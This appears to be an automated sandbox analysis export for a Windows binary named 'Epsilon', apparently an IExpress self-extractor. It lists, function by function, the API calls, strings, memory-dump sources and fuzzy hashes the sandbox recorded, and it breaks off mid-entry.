• API String ID: 3010855178-3123416969
• Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
• Instruction ID: b653d65363001422986f68a937e4ee6ccc557349d3f4b2b0430750437257f9f2
• Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
• Instruction Fuzzy Hash: 10714A20E0C64BB6FB60BB11A9542F5EEE0EF88747FC04035D94D42A91DF6CE827A630

Control-flow Graph

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF737822CE1), ref: 00007FF73782657C
• CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF737822CE1), ref: 00007FF73782662F
• RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF737822CE1), ref: 00007FF73782666F
  • Part of subcall function 00007FF7378263B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF737822CE1), ref: 00007FF737826423
  • Part of subcall function 00007FF7378263B8: GetFileAttributesA.KERNELBASE ref: 00007FF737826432
  • Part of subcall function 00007FF7378263B8: GetTempFileNameA.KERNEL32 ref: 00007FF73782645B
  • Part of subcall function 00007FF7378263B8: DeleteFileA.KERNEL32 ref: 00007FF737826473
  • Part of subcall function 00007FF7378263B8: CreateDirectoryA.KERNEL32 ref: 00007FF737826484
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-3703068183
• Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
• Instruction ID: 77d970f0ad6cf33be112bb581fa59680c7f0e8abe5d4ae9ff34a0fac40278749
• Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
• Instruction Fuzzy Hash: 0C519161B0D68AA2FB50AF25D9103F9EFA0AF44742FD84135C90D53A95DF7CE427E260

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Handle$AddressCloseExitModuleProcVersionWindows
• String ID: @$HeapSetInformation$Kernel32.dll
• API String ID: 1302179841-1204263913
• Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
• Instruction ID: 54f302cde6ed34e931790b04e51b9e27ecf77c5756cc3dee63c52a3c4af135e6
• Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
• Instruction Fuzzy Hash: 30317132E0C64EB6FB64BB20A4442F5FE90AF54752FC54131D90D122A5CF7CE463A630
APIs
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
• Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
• Instruction ID: 181b02b457421ff57148781c57d2252d439eda3d7de96c1fa07d12a322867563
• Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
• Instruction Fuzzy Hash: F2519031A0CB89A5EB11AF20D8002F8BBA1FB45B85FC58171DA5E07695DF3CE51BD320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
• String ID: $Adv
• API String ID: 2654313074-3776740653
• Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
• Instruction ID: 1bd780c471a5d27f7a3652d07ad2e89c953921b6b0ceb826c09d21ea91c9cd3c
• Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
• Instruction Fuzzy Hash: BC517331A0C64696E7506F11E9542F9FEA1FB8AB96FC49231C90E13B94CF3C9467E720

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
• API String ID: 3049360512-1423647952
• Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
• Instruction ID: 4c6f3ca7c8dffe93376bf849a1616d96ddd6b1c1d1a5c9bb9ceddf8e58095035
• Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
• Instruction Fuzzy Hash: 68511E21A0C68AA6EB10AF14E8543F9FFA0FB85746FC45131CA4D07694CF3DE46AD760

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-3916222277
• Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
• Instruction ID: 5100e637e1df04a86559a7d7dba2b9ed6574f7dc2621c52a33e39f4dc9a70322
• Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
• Instruction Fuzzy Hash: F151B43291C689A6F760AB10E4443F9FFA0FB8875AF904135D64D466A4CFBCD856DB30

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
• Opcode ID: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
• Instruction ID: 88e6a943f0cdff83ac58d76869f08f80c2786bf2bad326fedf44df7ad6b3b948
• Opcode Fuzzy Hash: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
• Instruction Fuzzy Hash: A131803260CB49DBD7109F25E8405EAFBA4FB88755F854535EA4D43B64CF38D061DB10

Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                • String ID: IXP$IXP%03d.TMP
                                                                                • API String ID: 1082909758-3932986939
                                                                                • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                • Instruction ID: 167419c7a10c0ec1e576be2db8e936f39b93996968d6141ade4cdaeca72e05b9
                                                                                • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                • Instruction Fuzzy Hash: 59214C71A0C945A6E710AB12E9503F9FA91EB8EB82FC58130DD4E52791CF3CE457D610
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                • String ID:
                                                                                • API String ID: 2995914023-0
                                                                                • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                • Instruction ID: 4dffd5ab730f831fab369297c8ceb5a3ff74d43f676fa54a135d2d608a4c60ec
                                                                                • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                • Instruction Fuzzy Hash: 76516C31A0CA4AA6EB60AB21E8443F5AAE0FF44756FD40531D94D83295DF3DE863F720
                                                                                APIs
                                                                                  • Part of subcall function 00007FF737825050: FindResourceExA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825078
                                                                                  • Part of subcall function 00007FF737825050: SizeofResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825089
                                                                                  • Part of subcall function 00007FF737825050: FindResourceA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250AF
                                                                                  • Part of subcall function 00007FF737825050: LoadResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250C0
                                                                                  • Part of subcall function 00007FF737825050: LockResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250CF
                                                                                  • Part of subcall function 00007FF737825050: memcpy_s.MSVCRT ref: 00007FF7378250EE
                                                                                  • Part of subcall function 00007FF737825050: FreeResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250FD
                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF737823123), ref: 00007FF7378260C9
                                                                                • LocalFree.KERNEL32 ref: 00007FF737826142
                                                                                  • Part of subcall function 00007FF737824DCC: LoadStringA.USER32 ref: 00007FF737824E60
                                                                                  • Part of subcall function 00007FF737824DCC: MessageBoxA.USER32 ref: 00007FF737824EA0
                                                                                  • Part of subcall function 00007FF737827700: GetLastError.KERNEL32 ref: 00007FF737827704
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                • String ID: $<None>$UPROMPT
                                                                                • API String ID: 957408736-2569542085
                                                                                • Opcode ID: 7026594253a11c1acd4dfce0892b575a0df76811d38349c329356a2fbd3cbb48
                                                                                • Instruction ID: bc81aca8455eb34f192dbc9488016fb61acbb973c2d23a30576301a7957dbadb
                                                                                • Opcode Fuzzy Hash: 7026594253a11c1acd4dfce0892b575a0df76811d38349c329356a2fbd3cbb48
                                                                                • Instruction Fuzzy Hash: 08318271B0C24AA7F7206F20E5547FAFE61FB85786F805134CA0E42A91DF7DE416AB20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile$lstrcmp
                                                                                • String ID: *MEMCAB
                                                                                • API String ID: 1301100335-3211172518
                                                                                • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                • Instruction ID: a7e1d9fd297bb5dea1ff717e9a9dcc02c075186db1bab2793dc5e2d544506275
                                                                                • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                • Instruction Fuzzy Hash: C66122A2A4D74996F7209F14A5843B9BE91FB45B76F844371DA6E426C0CF3CE023A720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: FileTime$AttributesDateLocalTextWindow
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 1150793416-1193786559
                                                                                • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                • Instruction ID: 55c021de51a8285cba30fd2f6b38bf17fe11a85ab9faef2561c3a3194844d669
                                                                                • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                • Instruction Fuzzy Hash: 1151C532A5EA4AA1EB60AB11E4401FDAF90FF49B52FC45171DA4E432D4CE3CE563D360
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                • String ID:
                                                                                • API String ID: 2212493051-0
                                                                                • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                • Instruction ID: 8c8f70d0e8b2dc8340afec8dff4207b487313dfa343a2be9507195bb4bb01013
                                                                                • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                • Instruction Fuzzy Hash: 9F316F32B186459AE7109B65E8049FDBFA1F749B9AF985130CE0A63B48CF3DE446DB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID: TMP4351$.TMP
                                                                                • API String ID: 3494564517-2619824408
                                                                                • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                • Instruction ID: 4805608aba97fd2b8d79d3d1a5992a57f6be5cb8010a16e684e3fad9c7727e59
                                                                                • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                • Instruction Fuzzy Hash: 40318B21A0C68997E710AF21A4143BAFE90FB85BA6F845334DA6E02BD5CF3CD4279710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3370778649-0
                                                                                • Opcode ID: 3bf69dff85db5cdf34237252cc992bc602bd2b6bf5befdefafbb4c61634c3979
                                                                                • Instruction ID: e902a4779709694bd7be3a88cd277b5e3af84d54edb21e2ba89f58dcdc98263f
                                                                                • Opcode Fuzzy Hash: 3bf69dff85db5cdf34237252cc992bc602bd2b6bf5befdefafbb4c61634c3979
                                                                                • Instruction Fuzzy Hash: 1E115C3170DB8597EB146B62A4040B9FEA0FB4EFC2F899178DD0E93B54DE3CD4529610
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                • String ID:
                                                                                • API String ID: 1214682469-0
                                                                                • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                • Instruction ID: c14c59d8eba987f8b9ad2940cf4d46d693a4375744742d4ba67726bb5dad94f9
                                                                                • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                • Instruction Fuzzy Hash: A5116F31A0CB4692EA109B12E4042A9FA60FB59FE6F884634DF5D07B94DF3CD4528B10
                                                                                APIs
                                                                                  • Part of subcall function 00007FF737823B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF737823A09), ref: 00007FF737823B64
                                                                                  • Part of subcall function 00007FF737823B40: PeekMessageA.USER32 ref: 00007FF737823B89
                                                                                  • Part of subcall function 00007FF737823B40: PeekMessageA.USER32 ref: 00007FF737823BCD
                                                                                • WriteFile.KERNELBASE ref: 00007FF7378256E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 1084409-0
                                                                                • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                • Instruction ID: c9c79f3929cf86c3e227409290e56f26679cd00b52d9a43148d67c7231512950
                                                                                • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                • Instruction Fuzzy Hash: 0621A120A0C54AD6E710AF15E8447B5FFA0FF84B9AF948235D96D066E4CF3CE426DB20
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                • String ID:
                                                                                • API String ID: 2018477427-0
                                                                                • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                • Instruction ID: 3398d0d95ffb900368933ecbe3b5e1b259efe26e1aeeae9cb90446bde2484f67
                                                                                • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                • Instruction Fuzzy Hash: 2E11CA3194C64AA2F7506B10E5843F4BEA0FB4531AFA84270C95C426E0CF7EE4A7A320
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrev
                                                                                • String ID:
                                                                                • API String ID: 122130370-0
                                                                                • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                • Instruction ID: 4952255f4e5df411a91ee20ba5029d6d1f43c805a3b757d52dd99c9aac46e612
                                                                                • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                • Instruction Fuzzy Hash: 3C014921A0C7C996F7016F22A8403ADFEA0A701BF1FE89234DB69077D5CB2CD4639710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
